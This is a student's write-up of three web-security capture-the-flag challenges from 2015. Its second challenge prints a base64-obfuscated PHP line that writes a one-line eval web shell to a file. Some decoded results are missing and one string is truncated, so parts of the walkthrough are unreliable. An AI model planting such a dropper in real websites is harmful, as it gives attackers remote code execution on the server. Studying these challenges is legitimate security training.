2015年南阳理工学院软件学院web安全1

本文仅限参考，如有抄袭，复制，切JJ一枚

本文使用繁体编写，如有需要请使用wps文档繁体转换成简体阅读。

WEB安全技術

姓名：秦密

班級：12級網安一班 學號：1215135068 指導老師：張鑫

2015 3月杯季賽 第二題 題目

HTTP://challenge.honyaedu.com:8886/2015-3/2/index.html

查看源碼

color=white>某年某月某日，菜刀大牛在網路聯盟伺服器上發現了一段奇怪的代碼：

color=white><?fputs(fopen(base64_decode("bm92b2ljZS5waHA="), "w"), base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyd0aGlzX2lzX3lpanVodWEnXSk7Pz4="));?>

color=white>據說本題的key就是導出的一句話的密碼

base64_decode(\zX2lzX3lpanVodWEnXSk7Pz4=\

看到有兩段base64的編碼

bm92b2ljZS5waHA= 這段解碼後是：novoice.php

PD9waHAgQGV2YWwoJF9QT1NUWyd0aGlzX2lzX3lpanVodWEnXSk7Pz4= 這段解碼後是：

可以看到一句話的密碼就是\

第三題 內容：

http://challenge.honyaedu.com:8886/2015-3/3/index.h

tml

UTF-7 編

碼 +AGsAZQB5ADoAaQBhAG0AdQB0AGYANwBlAG4AYwBvAGQAZQBk- .第一次聽到這個編碼，以前聽到最多的就是utf-8了.查了很多資料, 可以知道+和-中間的這段

\QAZQBk\是採用修正的base64進行編碼的. 複製這段直接base64解碼就可以知道key. Key：iamutf7encoded 第四題 內容：

http://challenge.honyaedu.com:8886/2015-3/4/index.h

tml

查看源碼

(unescape(\

idaoCheck(){ var MyPass = document.getElementById('Incantation').value; if(""+parseInt(MyPass) == MyPass) { if(parseInt(MyPass)+798789==1000000) { alert('复活成功！KEY就是复活咒语！'); }else{ alert('复活失败！请重新输入复

活咒语'); document.Get_Key.Incantation.value = ''; } }else{ alert('复活失败！请重新输入复活咒语'); document.Get_Key.Incantation.value = ''; }}\

使用unicode解碼之後看到如下一段關鍵代碼：

var MyPass = document.getElementById('Incantation').value; if(\

{

if(parseInt(MyPass)+798789==1000000) {

alert('復活成功！KEY就是復活咒語！'); }else{

alert('復活失敗！請重新輸入復活咒語'); document.Get_Key.Incantation.value = ''; } }else{

alert('復活失敗！請重新輸入復活咒語'); document.Get_Key.Incantation.value = ''; }

可以計算出MyPass的值為201211，輸入到html，芝麻開門之後就能獲取到key。

本文来源：https://www.bwwdw.com/article/a0ft.html